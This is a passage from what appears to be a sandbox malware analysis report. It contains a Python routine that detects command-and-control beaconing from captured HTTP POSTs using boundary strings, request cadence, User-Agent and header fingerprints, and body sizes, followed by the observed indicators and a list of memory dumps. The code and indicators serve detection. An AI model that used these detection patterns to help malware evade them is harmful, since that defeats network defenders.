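        gaps = [int((b - a).total_seconds()) for a, b in zip(ts_list, ts_list[1:])]
        out[proc] = {"count": len(ts_list), "gaps_s": gaps,
                     "median_gap_s": median(gaps) if gaps else None}
    return out


def client_fingerprints(events: Sequence[Event]) -> Dict[str, list]:
    """Distinct (User-Agent, header order) pairs per process: two IE UA strings and
    two header layouts from one host to one endpoint means one 'browser' is not one."""
    fps: Dict[str, set] = defaultdict(set)
    for _, proc, _, _, ua, hdrs in events:
        fps[proc].add((ua, hdrs))
    return {proc: sorted(v) for proc, v in fps.items()}


def beacon_report(events: Sequence[Event], max_gap_s: int = 60,
                  min_samples: int = 3, max_body: int = 1024) -> dict:
    """Assumed thresholds: >=3 POSTs with a median gap under a minute, and bodies
    that are small and of near-constant size."""
    cadence = intervals_by_process(events)
    sizes = [e[3] for e in events]
    return {
        "boundary": boundary_signature(events),
        "cadence": cadence,
        "fingerprints": client_fingerprints(events),
        "uas_seen": sorted({e[4] for e in events}),
        "uniform_small_bodies": max(sizes) - min(sizes) < 64 and max(sizes) < max_body,
        "beaconing": any(c["count"] >= min_samples and c["median_gap_s"] is not None
                         and c["median_gap_s"] < max_gap_s for c in cadence.values()),
    }


if __name__ == "__main__":
    print(beacon_report(EVENTS))
```

On this run every boundary ends in the same nine hex characters while the leading seven differ per request, the IE-attributed POSTs arrive roughly every 13 seconds, the bodies all fall between 772 and 793 bytes, and the same endpoint sees both a WOW64 and a Win64 IE11 User-Agent with different header orderings. The constant boundary tail is the most specific of these and the cheapest to match in a proxy log, but it is observed in a single sandbox run; whether it is stable per sample, per build or per victim is not something this report establishes, so treat it as a pivot to test against other captures rather than a signature.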

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1160-4-0x000007FEF77D0000-0x000007FEF7A4A000-memory.dmp (2.5MB)
  • memory/2004-3-0x00000000001C0000-0x00000000001D2000-memory.dmp (72KB)
